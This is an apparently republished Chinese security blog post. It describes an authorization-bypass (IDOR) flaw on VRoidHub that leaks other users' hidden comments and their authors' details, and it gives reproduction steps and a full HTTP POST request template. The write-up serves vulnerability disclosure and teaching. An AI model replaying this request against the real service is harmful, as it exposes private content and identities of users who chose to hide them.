文章总结： 该文档详细描述了一个在VRoidHub平台上发现的越权漏洞，该漏洞允许攻击者通过修改POST请求中的评论ID参数，绕过权限控制，强制访问并泄露其他用户已隐藏的评论内容及其发布者信息。攻击者只需注册两个账号，利用受害者关闭评论功能后留下的评论ID，构造特定请求即可实现信息泄露。文档提供了完整的漏洞复现步骤，包括截图和请求示例，并指出该漏洞虽被评定为中危，但在国内赏金可能较低。 综合评分： 75 文章分类： 漏洞分析,WEB安全,渗透测试,实战经验

越权所导致的信息泄露

原创

h1 h1

迪哥讲事

2026年2月16日 10:03 四川

正文

在 https://accounts.pixiv.net/ 上注册两个任意账号。

使用这两个账号分别登录 https://hub.vroid.com。

以受害者用户（UserVictim）身份操作：进入「提交角色」页面并提交一个角色，向下滚动后会看到：

（图 1）

「在此处上传媒体并允许评论」的区域

• 发布任意一条测试评论，然后在受害者用户（UserVictim）的媒体设置中关闭评论功能。

• （此步骤仅用于测试，真实攻击中无需执行）以受害者用户（UserVictim）身份获取评论 ID（后续会用到）：按下 Ctrl + U 查看页面源代码，再按 Ctrl + F 搜索关键词 entityIds。

  （图 2）

• 保存找到的评论 ID 备用。
• 以攻击者用户（UserAttacker）身份操作：拦截任何发往 https://hub.vroid.com/ 的 POST 请求，并将其发送到重发器（Repeater）。
• 将该 POST 请求的 URL 和参数修改为如下内容

POST /api/statuses/PASTE_ID_HERE/hearts HTTP/2
Host: hub.vroid.com
Cookie: 攻击者的Cookie
Sec-Ch-Ua: "Opera";v="109", "Not:A-Brand";v="8", "Chromium";v="123"
Accept: application/json, text/plain, */*
Content-Type: application/json
X-Api-Version: 11
Sec-Ch-Ua-Mobile: ?0
Content-Length: 2

{}

发送修改后的请求，你会在响应内容中看到被隐藏的评论原文及其发布者信息。通过这种方式，攻击者可以泄露任何已被隐藏的评论。

评论:

受害者主动关闭评论功能，是为了让已发布的评论 “不可见”，但漏洞导致这些内容被强制泄露，剥夺了用户对自身内容的管理权限

一个中危漏洞,但是在国内目测这个漏洞只给200

要春节了,搞了个半折优惠券给大家

参考

https://hackerone.com/reports/2541962

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：迪哥讲事 h1 h1《越权所导致的信息泄露》